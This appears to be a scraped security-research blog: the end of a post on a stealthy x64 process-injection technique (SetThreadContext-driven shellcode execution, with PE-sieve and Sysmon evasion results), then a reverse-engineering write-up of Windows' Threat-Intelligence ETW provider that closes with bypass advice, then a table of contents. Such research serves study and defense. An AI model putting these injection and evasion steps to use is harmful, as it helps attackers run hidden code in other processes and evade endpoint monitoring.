When WriteProcessMemory returns, it should return into the infinite jmp loop again, allowing the malicious process to make the final call to SetThreadContext to execute the shellcode:

    // Execute the shellcodez
    Success = SetExecutionContext(
        &ThreadHandle,
        // Set RIP to execute shellcode
        &ShellcodeLocation,
        // RSP is optional
        NULL,
        // Arguments to shellcode are optional
        0,
        0,
        0,
        0,
        NULL
    );

SetThreadContext to execute the shellcode

Overall, the entire injection procedure is as so:

SetThreadContext to an infinite jmp loop to allow SetThreadContext to reliably use volatile registers,
Locate a valid RW stack (or pseudo-stack) to host ReadProcessMemory and WriteProcessMemory arguments and the temporary shellcode,
Register a duplicated handle using DuplicateHandle for the target process to read the shellcode from the malicious process,
Call ReadProcessMemory using SetThreadContext to copy the shellcode,
Return into the infinte jmp loop after ReadProcessMemory,
Call WriteProcessMemory using SetThreadContext to copy the shellcode to an RX page,
Return into the infinite jmp loop after WriteProcessMemory,
Call the shellcode using SetThreadContext.

Detection Artifacts

To quickly test the stealth performance, I used two tools: hasherazade's PE-sieve and Sysinternal's Sysmon with SwiftOnSecurity's configuration. If there are any other defensive monitoring tools, I would love to see how well this technique holds up against them.

PE-sieve

Something I noticed while playing with PE-sieve is that if we inject the shellcode into the padding of the .text (or otherwise relevant) section, it will not be detected at all:

PE-sieve scan results on the target process

If the shellcode is too big to fit into the padding, perhaps another module might contain a bigger cave.

Sysmon Events

These are expected results using the CreateProcess call to spawn the target process instead of using OpenProcess. Something else to note is that the DuplicateHandle call might trigger a process handle event with ObRegisterCallbacks in Sysmon. This isn't the case because Sysmon does not follow the event if the handle access is performed by the process who owns that same handle. In the case with AVs or EDRs, it may be different.

Sysmon events

Further Improvements

I wouldn't doubt that there may be some issues that I have overlooked since I really rushed this (side) project – I just had to explore this idea and see how far I could go. With regards to recovering the hijacked thread execution, it is possible and I have implemented it in the PoC, but it is dependent on the malicious process which might or might not be a good thing. ¯\_(ツ)_/¯

Limitations

One of the limitations of this technique is that the shellcode size is restricted due to the use of existing pages. The shellcode must be able to fit within the RW stack as well as the RX section. Although searching for modules with bigger sections is possible, it may not always be big enough. In this scenario, I would recommend using staging shellcode.

Conclusion

So it's possible to not use WriteProcessMemory, VirtualAllocEx, VirtualProtectEx, CreateRemoteThread, NtCreateThreadEx, QueueUserApc, and NtQueueApcThread from the malicious process to inject into a remote process. The OpenProcess and OpenThread usage is still debatable because sometimes spawning a target process with CreateProcess isn't always the circumstance. However, it does remove a lot of suspicious calls which is the goal of this technique.

Since SetThreadContext is such a powerful primitive and crucial to this and many other stealthy techniques, will there be more focus on it? From what I can see, there is already native Windows logging available for it in Microsoft-Windows-Kernel-Audit-API-Calls ETW provider. I'm interested in seeing what the future will hold for process injection...

Introduction to Threat Intelligence ETW

NtRaiseHardError — Mon, 13 Apr 2020 10:19:58 GMT

Recently, the ETW functionality of Windows Defender was reintroduced to my attention after some discussion of existing methods of detecting malicious API calls and kernel callbacks (e.g. PsCreateThreadNotifyRoutine, and ObRegisterCallbacks). I've briefly heard of the ability for Defender to detect malicious APC injection which was researched here in a blog post by Souhail Hammou on Examining the user-mode APC injection sensor introduced in Windows 10 build 1809 which mentions the EtwTiLogQueueApcThread code. However, I just discovered that there was more than just APC injection. A recent blog post by B4rtik on Evading WinDefender ATP credential-theft: kernel version talks about attacking the ETW within the kernel by inline patching nt!EtwTiLogReadWriteVm to bypass detection of LSASS reads with NtReadVirtualMemory. It made me more curious as to how ETW worked so I had a look...

Note: The software versions at the time of writing are:

Microsoft Windows 10 Enterprise Evaluation Version 10.0.18363 Build 18363z
ntoskrnl.exe Version 10.0.18362.592
Windows Defender Antimalware Client Version: 4.18.1911.3
Windows Defender Engine Version: 1.1.16700.3
Windows Defender Antivirus Version: 1.309.527.0
Windows Defender Antispyware Version: 1.309.527.0

Uncovering Threat Intelligence ETW Capabilities

Following B4rtik, I looked into MiReadVirtualMemory (which is just wrapped by NtReadVirtualMemory). As described, it eventually makes a call to EtwTiLogReadWriteVm:

EtwTiLogReadWriteVm called in MiReadVirtualMemory

Judging by the name, this is probably called by NtWriteVirtualMemory as well. If we take a look inside, there's a function call to EtwProviderEnabled which takes in the argument EtwThreatIntProvRegHandle:

EtwProviderEnabled called with EtwThreadIntProvRegHandle

So this handle, I assume, is associated with "threat intelligence" events. If we cross-reference this handle, we can see that it is used in multiple other locations, namely:

EtwTiLogInsertQueueUserApc
EtwTiLogAllocExecVm
EtwTiLogProtectExecVm
EtwTiLogReadWriteVm
EtwTiLogDeviceObjectLoadUnload
EtwTiLogSetContextThread
EtwTiLogMapExecView
EtwTiLogDriverObjectLoad
EtwTiLogDriverObjectUnLoad
EtwTiLogSuspendResumeProcess
EtwTiLogSuspendResumeThread

Cross-references to EtwThreatIntProvRegHandle

It's quite obvious from these function names that the threat intelligence provider seems to log event data on very commonly-used malicious API such as VirtualAlloc, WriteProcessMemory, SetThreadContext and ResumeThread which are the bread and butter of process hollowing.

There is also a reference to EtwpInitialize which is where the handle is initialised:

EtwThreatIntProvRegHandle initialisation

EtwThreatIntProviderGuid is defined as such:

EtwThreatIntProviderGuid GUID value

We can verify that the Microsoft-Windows-Threat-Intelligence provider exists using logman on the command line:

logman showing Microsoft-Windows-Threat-Intelligence provider

I'm assuming that, theoretically, all of the usermode API derived from the cross-references of the EtwThreatIntProvRegHandle handle can be detected in real time by defensive tools subscribed to the event notifications.

Event Descriptors

There are different types of descriptors for each type of event "capability". If we take a quick look at the code after the call to EtwProviderEnabled in EtwTiLogReadWriteVm, we can see references to symbols like THREATINT_WRITEVM_REMOTE:

Call to EtwEventEnabled with different event descriptors

If we cross-reference one of these, we'll find the entire list of descriptors:

Threat Intelligence event descriptors

The EtwEventEnabled function determines if a certain event is enabled for logging on the associated provider handle. Brief analysis of the function, with the EtwThreatIntProvRegHandle static, shows that one of the key contributors of which event descriptor is logged relies on the bitmask of both the handle and event descriptor's _EVENT_DESCRIPTOR.Keyword value. If these two values tested together is not 0, the event will be logged.

The handle's value is a consistent 0x0000000`1c085445 value (across reboots) and the event descriptor's Keyword is detailed in the Threat Intelligence array shown above. If we & the handle's value and each of the event descriptor's bitmask values, we can see which are logged and which aren't (if I got this right):

THREATINT_MAPVIEW_LOCAL_KERNEL_CALLER: false
THREATINT_PROTECTVM_LOCAL_KERNEL_CALLER: false
THREATINT_ALLOCVM_LOCAL_KERNEL_CALLER: false
THREATINT_SETTHREADCONTEXT_REMOTE_KERNEL_CALLER: false
THREATINT_QUEUEUSERAPC_REMOTE_KERNEL_CALLER: false
THREATINT_MAPVIEW_REMOTE_KERNEL_CALLER: false
THREATINT_PROTECTVM_REMOTE_KERNEL_CALLER: false
THREATINT_ALLOCVM_REMOTE_KERNEL_CALLER: false
THREATINT_THAW_PROCESS: false
THREATINT_FREEZE_PROCESS: false
THREATINT_RESUME_PROCESS: false
THREATINT_SUSPEND_PROCESS: false
THREATINT_RESUME_THREAD: false
THREATINT_SUSPEND_THREAD: false
THREATINT_WRITEVM_REMOTE: true
THREATINT_READVM_REMOTE: false
THREATINT_WRITEVM_LOCAL: false
THREATINT_READVM_LOCAL: false
THREATINT_MAPVIEW_LOCAL: false
THREATINT_PROTECTVM_LOCAL: false
THREATINT_ALLOCVM_LOCAL: true
THREATINT_SETTHREADCONTEXT_REMOTE: true
THREATINT_QUEUEUSERAPC_REMOTE: true
THREATINT_MAPVIEW_REMOTE: true
THREATINT_PROTECTVM_REMOTE: true
THREATINT_ALLOCVM_REMOTE: true

Logging status of threat intelligence event descriptors

Here, local and remote refer to either its own (local) process or another (remote) process. We can see that local memory allocation and all but one of the remote operations are set to logged. There is a discrepancy here between this data and B4rtik's post. If remote virtual memory reads are not enabled here then how does Defender detect LSASS reads? Perhaps because B4rtik's Defender is ATP which I, unfortunately, do not have at the time of writing this. If this is true, then maybe the handle's 0x0000000`1c085445 value may be different as well.

Writing Event Data

Since this system does not receive event data on any virtual memory reads, let's look at the case of writes. If the EtwEventEnabled function returns TRUE, it will proceed to write the data using EtwWrite:

EtwWrite setup and call

Following the function definition, the data, UserData is passed in the 5th argument and the number of entries is in the 4th:

NTSTATUS EtwWrite(
  REGHANDLE              RegHandle,
  PCEVENT_DESCRIPTOR     EventDescriptor,
  LPCGUID                ActivityId,
  ULONG                  UserDataCount,
  PEVENT_DATA_DESCRIPTOR UserData
);

EtwWrite function definition

On a breakpoint in NtWriteVirtualMemory, we see the following arguments passed into the function:

rcx=0000000000000e7c (ProcessHandle)
rdx=0000020051af0000 (BaseAddress)
r8=000000cf8697e168  (Buffer)
r9=000000000000018c  (NumberOfBytesToWrite)

First four arguments to NtWriteVirtualMemory

On a breakpoint before calling EtwWrite in EtwTiLogReadWriteVm, the UserData can be seen like so:

2: kd> dq @rax L@r9*2
ffffd286`70970880  ffffd286`709709d0 00000000`00000004
ffffd286`70970890  ffffd601`2e59b468 00000000`00000004
ffffd286`709708a0  ffffd601`2e59b490 00000000`00000008
ffffd286`709708b0  ffffd286`70970870 00000000`00000008
ffffd286`709708c0  ffffd601`2e59b878 00000000`00000001
ffffd286`709708d0  ffffd601`2e59b879 00000000`00000001
ffffd286`709708e0  ffffd601`2e59b87a 00000000`00000001
ffffd286`709708f0  ffffd601`2cdb16d0 00000000`00000004
ffffd286`70970900  ffffd601`2cdb1680 00000000`00000008
ffffd286`70970910  ffffd601`2e991368 00000000`00000004
ffffd286`70970920  ffffd601`2e991390 00000000`00000008
ffffd286`70970930  ffffd286`70970878 00000000`00000008
ffffd286`70970940  ffffd601`2e991778 00000000`00000001
ffffd286`70970950  ffffd601`2e991779 00000000`00000001
ffffd286`70970960  ffffd601`2e99177a 00000000`00000001
ffffd286`70970970  ffffd286`709709f0 00000000`00000008
ffffd286`70970980  ffffd286`709709f8 00000000`00000008

Dumping EtwWrite EVENT_DATA_DESCRIPTOR entries

Each entry is an EVENT_DATA_DESCRIPTOR structure defined as such:

typedef struct _EVENT_DATA_DESCRIPTOR {
  ULONGLONG Ptr;
  ULONG     Size;
  union {
    ULONG Reserved;
    struct {
      UCHAR  Type;
      UCHAR  Reserved1;
      USHORT Reserved2;
    } DUMMYSTRUCTNAME;
  } DUMMYUNIONNAME;
} EVENT_DATA_DESCRIPTOR, *PEVENT_DATA_DESCRIPTOR;

EVENT_DATA_DESCRIPTOR structure

The Ptr points to the data and Size describes the size of the Ptr data in bytes. But what kind of data is logged? If we peek into some of these values, we can make out that the last two values correspond to the base address and the number of bytes written:

2: kd> dq poi(@rax+f0) L1
ffffd286`709709f0  00000200`51af0000
2: kd> dq poi(@rax+100) L1
ffffd286`709709f8  00000000`0000018c

Base address and number of bytes written in EtwWrite data

But what are the other 15 arguments? Luckily, the data is already out there. I gathered this information in ETW Explorer written by Pavel Yosifovich. If we explore the Microsoft-Windows-Threat-Intelligence provider and select the appropriate event descriptor, we can see all of the arguments:

ETW Explorer showing arguments to NtWriteVirtualMemory event data

Here is the entire argument list:

OperationStatus
CallingProcessId
CallingProcessCreateTime
CallingProcessStartKey
CallingProcessSignatureLevel
CallingProcessSectionSignatureLevel
CallingProcessProtection
CallingThreadId
CallingThreadCreateTime
TargetProcesId
TargetProcessCreateTime
TargetProcessStartKey
TargetProcessSignatureLevel
TargetProcessSectionSignatureLevel
TargetProcessProtection
BaseAddress
BytesCopied

Full argument list for NtWriteVirtualMemory event data

Protection Mask

If we reverse engineer another capability, NtAllocateVirtualMemory, we can see that there is another requirement besides being a local or remote operation. The call to MiMakeProtectionMask identifies the requested protection type:

MiMakeProtectionMask operates on the requested protection value

The return value of MiMakeProtectionMask is set to the r13d register which is later referenced when deciding if code should branch to EtwTiLogAllocExecVm:

MiMakeProtectionMask return value determines if the call should be logged

What's interesting is that MiMakeProtectionMask will return a value such that it will log the call if the requested protection includes execution permissions. I guess judging from the EtwTiLogAllocExecVm, it could be assumed that this the sole purpose.

This also occurs in the NtProtectVirtualMemory call. It first has a call to MiMakeProtectionMask with the requested protection:

MiMakeProtectionMask on requested protection

Though this is used to check if the protection type is valid, it may also return a value similar to that of NtAllocateVirtualMemory's. The second call to MiMakeProtectionMask is used to check the current protection:

MiMakeProtectionMask on current protection

The return value of this is combined with the value derived from the new protection. So if either the new or the current protection has execute permissions, the operation will be logged.

Conclusion

The Threat Intelligence ETW provides an interesting insight into how Microsoft may improve detection of malicious threats in conjunction with other kernel callbacks. Some things to note: being event-based makes this a retroactive system and some data is not recorded, for example, in NtWriteVirtualMemory, the data being written is not captured. Though I guess that the data may already exist in the given target address so it might not matter.

Having analysed which operations may and may not be logged, perhaps creating bypasses against defensive tools that utilise Threat Intelligence ETW may be more reliable. For example, local allocation without execute permissions will not be logged in addition to local protection logging being disabled, it is possible to allocate RW malicious code before reprotecting it with execute permissions. This would, theoretically, bypass any Threat Intelligence ETW captures.

Despite this technology being introduced, there is always the risk of false positives. Throughout the process of debugging, I've encountered an abundant amount of remote virtual memory writes just from the operating system itself. It's also known that .NET processes use RWX page permissions for JIT (which can also be abused for local injection of malicious code).

TL;DR: Don't touch other processes and allocate non-execute memory within your own process before reprotecting with execute permission.

References

Souhail Hammou - Examining the user-mode APC injection sensor introduced in Windows 10 build 1809

B4rtik - Evading WinDefender ATP credential-theft: kernel version

Hello World

NtRaiseHardError — Thu, 09 Apr 2020 06:51:56 GMT

suh

undev.ninja

Unrestricting Android Native Dynamic Library Linking

Introduction

Android dlopen

Bypassing Restrictions

Conclusion

Sysmon Internals - From File Delete Event to Kernel Code Execution

Introduction

File Delete Conditions

IRP_MJ_CREATE

IRP_MJ_CLEANUP

IRP_MJ_WRITE

Internals

File Delete Requirements

Reporting File Delete Events

QueueEvent

Retrieving Events

File Archiving

CopyFile

RenameFile

Bugs and Bypasses

File Shredding Bypass

File Delete and Overwrite Bypass

Arbitrary Kernel Write

Service Process Registration

Reading Events

Arbitrary Kernel Write to Kernel Code Execution

What We Have

Problem Solving

Demonstration

Notes for Defenders

YARA Signature

Conclusion

Sysmon Image File Name Evasion

Discovery

POC

Affected Events

Event ID 11 - FileCreate

Event ID 23 - FileDelete

Event ID 23 - RegistryEvent (Set Value)

Event ID 12 - RegistryEvent (Add or Delete)

ProcessAccess

Bypassing Logging

Bonus Process Access Method

Conclusion

NINA: x64 Process Injection

Implementation: No Injection

CreateProcess

VirtualAllocEx

ReadProcessMemory

SetThreadContext

Implementation: No Allocation

The Stack

Writing the Shellcode

Detection Artifacts

PE-sieve

Sysmon Events

Further Improvements

Limitations

Conclusion

Introduction to Threat Intelligence ETW

Uncovering Threat Intelligence ETW Capabilities

Event Descriptors

Writing Event Data

Protection Mask

Conclusion

References

Hello World

Android `dlopen`